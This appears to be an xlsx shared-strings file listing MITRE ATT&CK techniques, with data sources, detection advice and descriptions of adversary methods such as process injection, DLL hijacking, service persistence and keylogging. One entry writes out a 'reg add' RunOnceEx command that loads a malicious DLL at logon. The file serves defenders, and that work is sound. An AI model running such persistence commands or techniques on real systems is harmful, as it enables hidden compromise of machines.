  <si>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[Masquerading](https://attack.mitre.org/techniques/T1036) to look like a legitimate program. Adversaries could also edit the target path or entirely replace an existing shortcut so their tools will be executed instead of the intended legitimate program.</t>
  </si>
  <si>
    <t>Custom Cryptographic Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring</t>
  </si>
  <si>
    <t>If malware uses custom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 (Citation: University of Birmingham C2)</t>
  </si>
  <si>
    <t>Adversaries may use a custom cryptographic protocol or algorithm to hide command and control traffic. A simple scheme, such as XOR-ing the plaintext with a fixed key, will produce a very weak ciphertext.
Custom encryption schemes may vary in sophistication. Analysis and reverse engineering of malware samples may be enough to discover the algorithm and encryption key used.
Some adversaries may also attempt to implement their own version of a well-known cryptographic algorithm instead of using a known implementation library, which may lead to unintentional errors. (Citation: F-Secure Cosmicduke)</t>
  </si>
  <si>
    <t>Data from Removable Media</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</si>
  <si>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</si>
  <si>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[cmd](https://attack.mitre.org/software/S0106) may be used to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on removable media.</t>
  </si>
  <si>
    <t>Multiband Communication</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</si>
  <si>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Correlating alerts between multiple communication channels can further help identify command-and-control behavior.</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</si>
  <si>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</si>
  <si>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Obfuscated Files or Information</t>
  </si>
  <si>
    <t>Network protocol analysis,Process use of network,File monitoring,Malware reverse engineering,Binary file metadata,Process command-line parameters,Environment variable,Process monitoring,Windows event logs,Network intrusion detection system,Email gateway,SSL/TLS inspection</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</si>
  <si>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Flag and analyze commands containing indicators of obfuscation and known suspicious syntax such as uninterpreted escape characters like '''^''' and '''"'''. Windows' Sysmon and Event ID 4688 displays command-line arguments for processes. Deobfuscation tools can be used to detect these indicators in files/payloads. (Citation: GitHub Revoke-Obfuscation) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: GitHub Office-Crackros Aug 2016)
Obfuscation used in payloads for Initial Access can be detected at the network. Use network intrusion detection systems and email gateway filtering to identify compressed and encrypted attachments and scripts. Some email attachment detonation systems can open compressed and encrypted attachments. Payloads delivered over an encrypted connection from a website require encrypted network traffic inspection.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</si>
  <si>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obfuscate commands executed from payloads or directly via a [Command-Line Interface](https://attack.mitre.org/techniques/T1059). Environment variables, aliases, characters, and other platform/language specific semantics can be used to evade signature based detections and whitelisting mechanisms. (Citation: FireEye Obfuscation June 2017) (Citation: FireEye Revoke-Obfuscation July 2017) (Citation: PaloAlto EncodedCommand March 2017)
Another example of obfuscation is through the use of steganography, a technique of hiding messages or code in images, audio tracks, video clips, or text files. One of the first known and reported adversaries that used steganography activity surrounding [Invoke-PSImage](https://attack.mitre.org/software/S0231). The Duqu malware encrypted the gathered information from a victim's system and hid it into an image followed by exfiltrating the image to a C2 server. (Citation: Wikipedia Duqu) By the end of 2017, an adversary group used [Invoke-PSImage](https://attack.mitre.org/software/S0231) to hide PowerShell commands in an image file (png) and execute the code on a victim's system. In this particular case the PowerShell code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary. (Citation: McAfee Malicious Doc Targets Pyeongchang Olympics)</t>
  </si>
  <si>
    <t>Windows Remote Management</t>
  </si>
  <si>
    <t>File monitoring,Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</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</si>
  <si>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t>
  </si>
  <si>
    <t>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). (Citation: Microsoft WinRM) It may be called with the &lt;code&gt;winrm&lt;/code&gt; command or by any number of programs such as PowerShell. (Citation: Jacobsen 2014)</t>
  </si>
  <si>
    <t>execution,lateral-movement</t>
  </si>
  <si>
    <t>Scheduled Transfer</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process use of network,Process monitoring</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</si>
  <si>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</si>
  <si>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</si>
  <si>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Data Transfer Size Limits</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server).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</si>
  <si>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An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>Modify Existing Service</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence. (Citation: TechNet Autoruns) 
Service information is stored in the Registry at &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;.
Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute [cmd](https://attack.mitre.org/software/S0106) commands or scripts.
Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075).
Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of [Masquerading](https://attack.mitre.org/techniques/T1036) that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.
Adversaries may also intentionally corrupt or kill services to execute malicious recovery programs/commands. (Citation: Twitter Service Recovery Nov 2017) (Citation: Microsoft Service Recovery Feb 2013)</t>
  </si>
  <si>
    <t>Standard Cryptographic Protocol</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks)
If malware uses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</si>
  <si>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Adversaries may explicitly employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if necessary secret keys are encoded and/or generated within malware samples/configuration files.</t>
  </si>
  <si>
    <t>System Owner/User Discovery</t>
  </si>
  <si>
    <t>### Windows
Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using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 Mac
On Mac, the currently logged in user can be identified with &lt;code&gt;users&lt;/code&gt;,&lt;code&gt;w&lt;/code&gt;, and &lt;code&gt;who&lt;/code&gt;.
### Linux
On Linux, the currently logged in user can be identified with &lt;code&gt;w&lt;/code&gt; and &lt;code&gt;who&lt;/code&gt;.</t>
  </si>
  <si>
    <t>Path Interception</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring</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</si>
  <si>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</si>
  <si>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Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of [cmd](https://attack.mitre.org/software/S0106) in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function. (Citation: TechNet MS14-019)
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
### Unquoted Paths
Service paths (stored in Windows Registry keys) (Citation: Microsoft Subkey) and shortcut paths are vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Baggett 2012)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SecurityBoulevard Unquoted Services APR 2018) (Citation: SploitSpren Windows Priv Jan 2018)
### PATH Environment Variable Misconfiguration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
### Search Order Hijacking
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. The search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Hill NT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MSDN Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1038).</t>
  </si>
  <si>
    <t>Service Execution</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command-line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[PsExec](https://attack.mitre.org/software/S0029).</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</si>
  <si>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Service](https://attack.mitre.org/techniques/T1050) and [Modify Existing Service](https://attack.mitre.org/techniques/T1031) during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>execution</t>
  </si>
  <si>
    <t>Masquerading</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Binary file metadata</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</si>
  <si>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binary name on disk and the binary's resource section, this is a likely indicator that a binary was renamed after it was compiled. Collecting and comparing disk and resource filenames for binaries could provide useful leads, but may not always be indicative of malicious activity. (Citation: Endgame Masquerade Ball)</t>
  </si>
  <si>
    <t>Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. Several different variations of this technique have been observed.
One variant is for an executable to be placed in a commonly trusted directory or given the name of a legitimate, trusted program. Alternatively, the filename given may be a close approximation of legitimate programs. This is done to bypass tools that trust executables by relying on file name or path, as well as to deceive defenders and system administrators into thinking a file is benign by associating the name with something that is thought to be legitimate.
### Windows
In another variation of this technique, an adversary may use a renamed copy of a legitimate utility, such as rundll32.exe. (Citation: Endgame Masquerade Ball) An alternative case occurs when a legitimate utility is moved to a different directory and also renamed to avoid detections based on system utilities executing from non-standard paths. (Citation: F-Secure CozyDuke)
An example of abuse of trusted locations in Windows would be the &lt;code&gt;C:\Windows\System32&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binares include "explorer.exe" and "svchost.exe".
### Linux
Another variation of this technique includes malicious binaries changing the name of their running process to that of a trusted or benign process, after they have been launched as opposed to before. (Citation: Remaiten)
An example of abuse of trusted locations in Linux  would be the &lt;code&gt;/bin&lt;/code&gt; directory. Examples of trusted binary names that can be given to malicious binares include "rsyncd" and "dbus-inotifier". (Citation: Fysbis Palo Alto Analysis)  (Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>Logon Scripts</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>### Windows
Windows allows logon scripts to be run whenever a specific user or group of users log into a system. (Citation: TechNet Logon Scripts)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
### Mac
Mac allows login and logoff hooks to be run as root whenever a specific user logs into or out of a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike startup items, a login hook executes as root (Citation: creating login hook). There can only be one login hook at a time though. If adversaries can access these scripts, they can insert additional code to the script to execute their tools when a user logs in.</t>
  </si>
  <si>
    <t>lateral-movement,persistence</t>
  </si>
  <si>
    <t>DLL Search Order Hijacking</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process monitoring,Process command-line parameters</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</si>
  <si>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t>
  </si>
  <si>
    <t>Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft DLL Search) Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. 
Adversaries may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 (Citation: Microsoft 2269637) Adversaries may use this behavior to cause the program to load a malicious DLL. 
Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation. (Citation: Microsoft DLL Redirection) (Citation: Microsoft Manifests) (Citation: Mandiant Search Order)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</si>
  <si>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persistence,privilege-escalation,defense-evasion</t>
  </si>
  <si>
    <t>Data from Network Shared Drive</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</si>
  <si>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</si>
  <si>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Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration.
Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.</t>
  </si>
  <si>
    <t>Network Sniffing</t>
  </si>
  <si>
    <t>Network device logs,Host network interface,Netflow/Enclave netflow,Process monitoring</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</si>
  <si>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</si>
  <si>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Poisoning](https://attack.mitre.org/techniques/T1171), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.
Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (ex: IP addressing, hostnames, VLAN IDs) necessary for follow-on Lateral Movement and/or Defense Evasion activities.</t>
  </si>
  <si>
    <t>credential-access,discovery</t>
  </si>
  <si>
    <t>Exfiltration Over Command and Control Channel</t>
  </si>
  <si>
    <t>Detection for command and control applies.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</si>
  <si>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Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>Change Default File Association</t>
  </si>
  <si>
    <t>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Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access (Citation: Microsoft Change Default Programs) (Citation: Microsoft File Handlers) or by administrators using the built-in assoc utility. (Citation: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 (Citation: TrendMicro TROJ-FAKEAV OCT 2012)</t>
  </si>
  <si>
    <t>Commonly Used Port</t>
  </si>
  <si>
    <t>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. They may use commonly open ports such as
* TCP:80 (HTTP)
* TCP:443 (HTTPS)
* TCP:25 (SMTP)
* TCP/UDP:53 (DNS)
They may use the protocol associated with the port or a completely different protocol. 
For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), examples of common ports are 
* TCP/UDP:135 (RPC)
* TCP/UDP:22 (SSH)
* TCP/UDP:3389 (RDP)</t>
  </si>
  <si>
    <t>File System Permissions Weakness</t>
  </si>
  <si>
    <t>File monitoring,Services,Process command-line parameters</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</si>
  <si>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</si>
  <si>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 Services
Manipulation of Windows service binaries is one variation of this technique. Adversaries may replace a legitimate service executable with their own executable to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService). Once the service is started, either directly by the user (if appropriate access is available) or through some other means, such as a system restart if the service starts on bootup, the replaced executable will run instead of the original service executable.
### Executable Installers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Hijacking](https://attack.mitre.org/techniques/T1038). Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088). Several examples of this weakness in existing common installers have been reported to software vendors. (Citation: Mozilla Firefox Installer DLL Hijack) (Citation: Seclists Kanthak 7zip Installer)</t>
  </si>
  <si>
    <t>Software Packing</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</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</si>
  <si>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 (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.</t>
  </si>
  <si>
    <t>Network Service Scanning</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Network protocol analysis,Packet capture,Process command-line parameters,Process use of network</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</si>
  <si>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from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.</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</si>
  <si>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</si>
  <si>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Windows Management Instrumentation</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) (Citation: Wikipedia SMB) and Remote Procedure Call Service (RPCS) (Citation: TechNet RPC) for remote access. RPCS operates over port 135. (Citation: MSDN WMI)
An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement. (Citation: FireEye WMI 2015)</t>
  </si>
  <si>
    <t>Exfiltration Over Alternative Protocol</t>
  </si>
  <si>
    <t>User interface,Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis</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</si>
  <si>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</si>
  <si>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System Network Connections Discovery</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. 
### Windows
Utilities and commands that acquire this information include [netstat](https://attack.mitre.org/software/S0104), "net use," and "net session" with [Net](https://attack.mitre.org/software/S0039).
### Mac and Linux 
In Mac and Linux, &lt;code&gt;netstat&lt;/code&gt; and &lt;code&gt;lsof&lt;/code&gt; can be used to list current connections. &lt;code&gt;who -a&lt;/code&gt; and &lt;code&gt;w&lt;/code&gt; can be used to show which users are currently logged in, similar to "net session".</t>
  </si>
  <si>
    <t>New Service</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor service creation through changes in the Registry and common utilities using command-line invocation. Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017) (Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services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(Citation: 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create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services)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[Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).</t>
  </si>
  <si>
    <t>Shared Webroot</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</si>
  <si>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t>
  </si>
  <si>
    <t>Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018)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 (Citation: Webroot PHP 2011)</t>
  </si>
  <si>
    <t>Exfiltration Over Physical Medium</t>
  </si>
  <si>
    <t>Data loss prevention,File monitoring</t>
  </si>
  <si>
    <t>Monitor file access on removable media. Detect processes that execute when removable media are mounted.</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</si>
  <si>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</si>
  <si>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Scheduled Task</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,Windows event logs</t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the &lt;code&gt;svchost.exe&lt;/code&gt; in Windows 10 and the Windows Task Scheduler &lt;code&gt;taskeng.exe&lt;/code&gt; for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in &lt;code&gt;%systemroot%\System32\Tasks&lt;/code&gt; for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.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
* Event ID 106 - Scheduled task registered
* Event ID 140 - Scheduled task updated
* Event ID 141 - Scheduled task removed
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns) Look for changes to tasks that do not correlate with known software, patch cycles, etc. Suspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be taken to create tasks. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Utilities such as [at](https://attack.mitre.org/software/S0110) and [schtasks](https://attack.mitre.org/software/S0111),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 (Citation: TechNet Task Scheduler Security)
An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>execution,persistence,privilege-escalation</t>
  </si>
  <si>
    <t>Indicator Blocking</t>
  </si>
  <si>
    <t>Sensor health and status,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include modifying sensor settings stored in configuration files and/or Registry keys to disable or maliciously redirect event telemetry. (Citation: Microsoft Lamin Sept 2017)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t>
  </si>
  <si>
    <t>Process Injection</t>
  </si>
  <si>
    <t>API monitoring,Windows Registry,File monitoring,DLL monitoring,Process monitoring,Named Pipes</t>
  </si>
  <si>
    <t>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API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC/NtQueueApcThread, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Endgame Process Injection July 2017)
Monitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics)  (Citation: GNU Acct)  (Citation: RHEL auditd)  (Citation: Chokepoint preload rootkits)
Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)
Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using [PowerShell](https://attack.mitre.org/techniques/T1086) with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.</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</si>
  <si>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 Windows
There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Endgame Process Injection July 2017)
* **Dynamic-link library (DLL) injection** involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
* **Portable executable injection** involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
* **Thread execution hijacking** involves injecting malicious code or the path to a DLL into a thread of a process. Similar to [Process Hollowing](https://attack.mitre.org/techniques/T1093), the thread must first be suspended.
* **Asynchronous Procedure Call** (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process's thread. Queued APC functions are executed when the thread enters an alterable state.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 (Citation: Microsoft Atom Table)
* **Thread Local Storage** (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code's legitimate entry point. (Citation: FireEye TLS Nov 2017)
### Mac and Linux
Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)
* **LD_PRELOAD, LD_LIBRARY_PATH** (Linux), **DYLD_INSERT_LIBRARIES** (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
* **Ptrace system calls** can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
* **/proc/[pid]/mem** provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
* **VDSO hijacking** performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)
Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.</t>
  </si>
  <si>
    <t>defense-evasion,privilege-escalation</t>
  </si>
  <si>
    <t>Input Capture</t>
  </si>
  <si>
    <t>Windows Registry,Kernel drivers,Process monitoring,API monitoring</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsyncKeyState. (Citation: Adventures of a Keystroke)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 (Citation: Wrightson 2012) Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in use by adversaries may help to catch the result of user input interception if new techniques are used.</t>
  </si>
  <si>
    <t>Adversaries can use methods of capturing user input for obtaining credentials for [Valid Accounts](https://attack.mitre.org/techniques/T1078) and information Collection that include keylogging and user input field interception.
Keylogging is the most prevalent type of input capture, with many different ways of intercepting keystrokes, (Citation: Adventures of a Keystroke) but other methods exist to target information for specific purposes, such as performing a UAC prompt or wrapping the Windows default credential provider. (Citation: Wrightson 2012)
Keylogging is likely to be used to acquire credentials for new access opportunities when [Credential Dumping](https://attack.mitre.org/techniques/T1003) efforts are not effective, and may require an adversary to remain passive on a system for a period of time before an opportunity arises.
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 (Citation: Volexity Virtual Private Keylogging)</t>
  </si>
  <si>
    <t>collection,credential-access</t>
  </si>
  <si>
    <t>Process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</si>
  <si>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</si>
  <si>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attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software running on systems within the network.
### Windows
An example command that would obtain details on processes is "tasklist" using the [Tasklist](https://attack.mitre.org/software/S0057) utility.
### Mac and Linux
In Mac and Linux, this is accomplished with the &lt;code&gt;ps&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Service Registry Permissions Weakness</t>
  </si>
  <si>
    <t>Process command-line parameters,Services,Windows Registry</t>
  </si>
  <si>
    <t>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be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1086), so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>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 or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)
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
Adversaries may also alter Registry keys associated with service failure parameters (such as &lt;code&gt;FailureCommand&lt;/code&gt;) that may be executed in an elevated context anytime the service fails or is intentionally corrupted. (Citation: Twitter Service Recovery Nov 2017)</t>
  </si>
  <si>
    <t>Command-Line Interface</t>
  </si>
  <si>
    <t>Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.</t>
  </si>
  <si>
    <t>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. (Citation: Wikipedia Command-Line Interface) One example command-line interface on Windows systems is [cmd](https://attack.mitre.org/software/S0106),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Task](https://attack.mitre.org/techniques/T1053)).
Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</t>
  </si>
  <si>
    <t>Registry Run Keys / Startup Folder</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring</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</si>
  <si>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(Citation: TechNet Autoruns)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</si>
  <si>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Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. (Citation: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The &lt;code&gt;HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx&lt;/code&gt; is also available but is not created by default on Windows Visa and newer. Registry run key entries can reference programs directly or list them as a dependency. (Citation: Microsoft RunOnceEx APR 2018) For example, it is possible to load a DLL at logon using a "Depend" key with RunOnceEx: &lt;code&gt;reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "C:\temp\evil[.]dll"&lt;/code&gt; (Citation: Oddvar Moe RunOnceEx Mar 2018)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</si>
  <si>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Graphical User Interface</t>
  </si>
  <si>
    <t>Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions. 
Unknown or unusual process launches outside of normal behavior on a particular system occurring through remote interactive sessions are suspicious. Collect and audit security logs that may indicate access to and use of [[Legitimate Credentials]] to access remote systems within the network.</t>
  </si>
  <si>
    <t>The Graphical User Interfaces (GUI) is a common way to interact with an operating system. Adversaries may use a system's GUI during an operation, commonly through a remote interactive session such as [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076), instead of through a [Command-Line Interface](https://attack.mitre.org/techniques/T1059), to search for information and execute files via mouse double-click events, the Windows Run command (Citation: Wikipedia Run Command), or other potentially difficult to monitor interactions.</t>
  </si>
  <si>
    <t>Hypervisor</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</si>
  <si>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 (Citation: virtualization.info 2006)</t>
  </si>
  <si>
    <t>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. (Citation: Wikipedia Hypervisor) It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. (Citation: Wikipedia Xen) A type-1 hypervisor operates at a level below the operating system and could be designed with [Rootkit](https://attack.mitre.org/techniques/T1014) functionality to hide its existence from the guest operating system. (Citation: Myers 2007) A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
  </si>
  <si>
    <t>Security Software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</si>
  <si>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</si>
  <si>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
### Windows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 Mac
It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Process command-line parameters</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</si>
